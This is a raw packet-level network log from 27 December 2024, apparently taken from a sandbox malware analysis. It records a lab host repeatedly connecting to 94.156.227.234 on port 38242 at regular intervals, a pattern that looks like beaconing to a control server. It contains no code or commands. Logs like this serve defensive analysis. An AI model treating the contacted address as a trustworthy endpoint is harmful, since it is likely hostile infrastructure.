                                                                    Dec 27, 2024 09:14:12.155468941 CET43928443192.168.2.2391.189.91.42
                                                                    Dec 27, 2024 09:14:12.202544928 CET382426002694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:12.202622890 CET6002638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:12.583028078 CET6002838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:12.702750921 CET382426002894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:12.702821970 CET6002838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:12.702852011 CET6002838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:12.822706938 CET382426002894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:13.206787109 CET6002838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:13.366632938 CET382426002894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:13.890666962 CET382426002894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:13.890762091 CET6002838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:14.207690001 CET6003038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:14.327284098 CET382426003094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:14.327382088 CET6003038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:14.327415943 CET6003038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:14.446985960 CET382426003094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:14.831995010 CET6003038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:14.994729042 CET382426003094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:15.517940044 CET382426003094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:15.518009901 CET6003038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:15.833555937 CET6003238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:15.953463078 CET382426003294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:15.953582048 CET6003238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:15.953615904 CET6003238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:16.073443890 CET382426003294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:16.576107025 CET6003238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:16.742624998 CET382426003294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:17.074603081 CET382426003294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:17.074690104 CET6003238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:17.577634096 CET6003438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:17.697454929 CET382426003494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:17.697523117 CET6003438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:17.697559118 CET6003438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:17.818106890 CET382426003494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:18.201805115 CET6003438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:18.362768888 CET382426003494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:18.859714985 CET382426003494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:18.859816074 CET6003438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:19.202913046 CET6003638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:19.322545052 CET382426003694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:19.322623968 CET6003638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:19.322669983 CET6003638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:19.442135096 CET382426003694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:19.834505081 CET6003638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:19.994777918 CET382426003694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:20.584541082 CET382426003694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:20.584645033 CET6003638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:20.835664034 CET6003838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:20.955236912 CET382426003894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:20.955333948 CET6003838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:20.955404043 CET6003838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:21.074886084 CET382426003894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:21.461148024 CET6003838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:21.622658014 CET382426003894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:22.123420954 CET382426003894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:22.123522997 CET6003838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:22.462050915 CET6004038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:22.581423998 CET382426004094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:22.581583977 CET6004038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:22.581747055 CET6004038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:22.701395988 CET382426004094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:23.085845947 CET6004038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:23.246712923 CET382426004094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:23.777504921 CET382426004094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:23.777575016 CET6004038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:24.087061882 CET6004238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:24.206773043 CET382426004294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:24.206880093 CET6004238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:24.206949949 CET6004238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:24.326445103 CET382426004294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:24.437793016 CET42836443192.168.2.2391.189.91.43
                                                                    Dec 27, 2024 09:14:24.711298943 CET6004238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:24.874780893 CET382426004294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:25.401211023 CET382426004294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:25.401285887 CET6004238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:25.712095022 CET6004438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:25.832254887 CET382426004494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:25.832334995 CET6004438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:25.832362890 CET6004438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:25.951848984 CET382426004494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:26.336466074 CET6004438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:26.498771906 CET382426004494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:27.010833979 CET382426004494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:27.010929108 CET6004438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:27.337433100 CET6004638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:27.456960917 CET382426004694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:27.457077026 CET6004638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:27.457098007 CET6004638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:27.576699972 CET382426004694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:27.961097956 CET6004638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:28.122710943 CET382426004694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:28.622426033 CET382426004694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:28.622498989 CET6004638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:28.962151051 CET6004838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:29.081589937 CET382426004894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:29.081665039 CET6004838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:29.081726074 CET6004838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:29.201165915 CET382426004894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:29.585493088 CET6004838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:29.746856928 CET382426004894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:30.268327951 CET382426004894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:30.268419981 CET6004838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:30.580938101 CET4251680192.168.2.23109.202.202.202
                                                                    Dec 27, 2024 09:14:30.586668968 CET6005038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:30.707010984 CET382426005094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:30.707081079 CET6005038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:30.707118034 CET6005038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:30.827574968 CET382426005094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:31.211090088 CET6005038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:31.370907068 CET382426005094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:31.832748890 CET382426005094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:31.832824945 CET6005038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:32.212081909 CET6005238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:32.332381010 CET382426005294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:32.332485914 CET6005238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:32.332576036 CET6005238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:32.452078104 CET382426005294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:32.837610006 CET6005238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:32.998820066 CET382426005294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:33.490320921 CET382426005294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:33.490533113 CET6005238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:33.838732004 CET6005438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:33.958246946 CET382426005494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:33.958327055 CET6005438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:33.958375931 CET6005438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:34.077857018 CET382426005494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:34.462769985 CET6005438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:34.622761011 CET382426005494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:35.142919064 CET382426005494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:35.142997980 CET6005438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:35.463901043 CET6005638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:35.583575964 CET382426005694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:35.583694935 CET6005638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:35.583741903 CET6005638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:35.703282118 CET382426005694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:36.089107990 CET6005638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:36.250746012 CET382426005694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:36.795536041 CET382426005694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:36.795613050 CET6005638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:37.091000080 CET6005838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:37.210658073 CET382426005894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:37.210854053 CET6005838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:37.210854053 CET6005838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:37.330513954 CET382426005894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:37.715900898 CET6005838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:37.878793001 CET382426005894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:38.403014898 CET382426005894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:38.403132915 CET6005838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:38.717053890 CET6006038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:38.836759090 CET382426006094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:38.836839914 CET6006038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:38.836899042 CET6006038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:38.956502914 CET382426006094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:39.341188908 CET6006038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:39.559772968 CET382426006094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:40.342341900 CET6006238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:40.489568949 CET382426006094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:40.489660025 CET6006038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:40.489726067 CET382426006094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:40.489763975 CET382426006294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:40.489845991 CET6006238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:40.489859104 CET6006038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:40.489875078 CET6006238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:40.610860109 CET382426006094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:40.611326933 CET382426006294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:40.993927956 CET6006238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:41.154793978 CET382426006294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:41.644048929 CET382426006294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:41.644126892 CET6006238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:41.995471954 CET6006438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:42.115400076 CET382426006494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:42.115503073 CET6006438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:42.115551949 CET6006438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:42.235073090 CET382426006494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:42.619956970 CET6006438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:42.783996105 CET382426006494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:43.315947056 CET382426006494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:43.316016912 CET6006438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:43.624690056 CET6006638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:43.744395018 CET382426006694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:43.744759083 CET6006638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:43.744759083 CET6006638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:43.865400076 CET382426006694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:44.250513077 CET6006638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:44.410820961 CET382426006694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:44.939579964 CET382426006694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:44.939768076 CET6006638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:45.251641035 CET6006838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:45.371165037 CET382426006894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:45.371273994 CET6006838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:45.371321917 CET6006838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:45.490890980 CET382426006894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:45.877589941 CET6006838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:46.038794994 CET382426006894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:46.532499075 CET382426006894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:46.532761097 CET6006838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:46.879069090 CET6007038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:46.998949051 CET382426007094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:46.999038935 CET6007038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:46.999080896 CET6007038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:47.118613005 CET382426007094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:47.504884958 CET6007038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:47.666791916 CET382426007094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:48.208410978 CET382426007094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:48.208530903 CET6007038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:48.506120920 CET6007238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:48.625792027 CET382426007294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:48.625901937 CET6007238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:48.626007080 CET6007238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:48.745398998 CET382426007294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:49.130748034 CET6007238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:49.290966988 CET382426007294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:49.779334068 CET382426007294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:49.779572964 CET6007238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:50.132282019 CET6007438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:50.251934052 CET382426007494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:50.252093077 CET6007438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:50.252168894 CET6007438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:50.371711016 CET382426007494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:50.758291006 CET6007438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:50.918879032 CET382426007494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:51.418210983 CET382426007494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:51.418379068 CET6007438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:51.759526014 CET6007638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:51.879151106 CET382426007694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:51.879327059 CET6007638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:51.879373074 CET6007638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:51.999022961 CET382426007694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:52.383476019 CET6007638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:52.546886921 CET382426007694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:53.097552061 CET382426007694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:53.097671986 CET6007638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:53.105858088 CET43928443192.168.2.2391.189.91.42
                                                                    Dec 27, 2024 09:14:53.385216951 CET6007838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:53.504793882 CET382426007894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:53.504905939 CET6007838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:53.504968882 CET6007838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:53.624500036 CET382426007894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:54.011368990 CET6007838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:54.174972057 CET382426007894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:54.696703911 CET382426007894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:54.696830988 CET6007838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:55.013173103 CET6008038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:55.132694006 CET382426008094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:55.132843018 CET6008038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:55.132947922 CET6008038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:55.252916098 CET382426008094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:55.639148951 CET6008038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:55.798940897 CET382426008094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:56.329735041 CET382426008094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:56.329873085 CET6008038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:56.640171051 CET6008238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:56.760570049 CET382426008294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:56.760678053 CET6008238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:56.760755062 CET6008238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:56.880223036 CET382426008294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:57.266911983 CET6008238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:57.649216890 CET6008238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:57.669441938 CET382426008294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:57.769006968 CET382426008294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:58.011858940 CET382426008294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:58.011975050 CET6008238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:58.268270969 CET6008438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:58.388645887 CET382426008494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:58.388761997 CET6008438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:58.388842106 CET6008438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:58.508444071 CET382426008494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:58.894375086 CET6008438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:59.054959059 CET382426008494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:59.505135059 CET382426008494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:14:59.505218983 CET6008438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:14:59.895780087 CET6008638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:00.015379906 CET382426008694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:00.015526056 CET6008638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:00.015615940 CET6008638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:00.135114908 CET382426008694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:00.520032883 CET6008638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:00.683866978 CET382426008694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:01.164702892 CET382426008694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:01.164834023 CET6008638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:01.521286011 CET6008838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:01.640954018 CET382426008894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:01.641040087 CET6008838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:01.641143084 CET6008838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:01.761805058 CET382426008894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:02.145651102 CET6008838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:02.306957960 CET382426008894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:02.800367117 CET382426008894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:02.800476074 CET6008838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:03.146683931 CET6009038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:03.266383886 CET382426009094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:03.266521931 CET6009038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:03.266567945 CET6009038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:03.386220932 CET382426009094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:03.771722078 CET6009038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:04.087068081 CET382426009094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:04.471205950 CET382426009094.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:04.471355915 CET6009038242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:04.773379087 CET6009238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:04.893048048 CET382426009294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:04.893145084 CET6009238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:04.893239975 CET6009238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:05.012959957 CET382426009294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:05.400316954 CET6009238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:05.563040018 CET382426009294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:06.081844091 CET382426009294.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:06.081931114 CET6009238242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:06.401591063 CET6009438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:06.521142006 CET382426009494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:06.521204948 CET6009438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:06.521255016 CET6009438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:06.640924931 CET382426009494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:07.025283098 CET6009438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:07.186969995 CET382426009494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:07.763130903 CET382426009494.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:07.763252974 CET6009438242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:08.026768923 CET6009638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:08.146416903 CET382426009694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:08.146553993 CET6009638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:08.146634102 CET6009638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:08.266185999 CET382426009694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:08.651139975 CET6009638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:08.811022043 CET382426009694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:09.301398993 CET382426009694.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:09.301634073 CET6009638242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:09.652681112 CET6009838242192.168.2.2394.156.227.234
                                                                    Dec 27, 2024 09:15:09.772351980 CET382426009894.156.227.234192.168.2.23
                                                                    Dec 27, 2024 09:15:09.772516012 CET6009838242192.168.2.2394.156.227.234
